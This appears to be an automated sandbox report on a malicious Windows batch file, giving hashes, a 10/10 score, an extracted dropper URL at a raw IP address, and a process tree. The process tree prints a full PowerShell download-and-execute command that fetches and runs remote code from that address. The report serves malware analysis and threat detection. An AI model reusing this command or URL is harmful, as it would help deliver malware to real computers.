Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
29-03-2020 01:10
General
-
Target
1c1ZUgnt.bat
-
Size
196B
-
MD5
cb7296b610a771b90d52c03f98af690c
-
SHA1
98bb42352fded772b23aa8bdc75ca2b494f3f9f6
-
SHA256
22c855a56ba425079b34a778d8144851b1217a719c1020c77f3765c3edef8b6b
-
SHA512
a21fa057c0919aa80fb56dd65c1360fea894bfe267727d9c22e9dfa519ac57bf74e0693f0472ffc1249b62a527296e92a2865465b314930f131909789602b510
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/1c1ZUgnt
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1c1ZUgnt.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1c1ZUgnt');Invoke-SCUCDUFCWDDHX;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB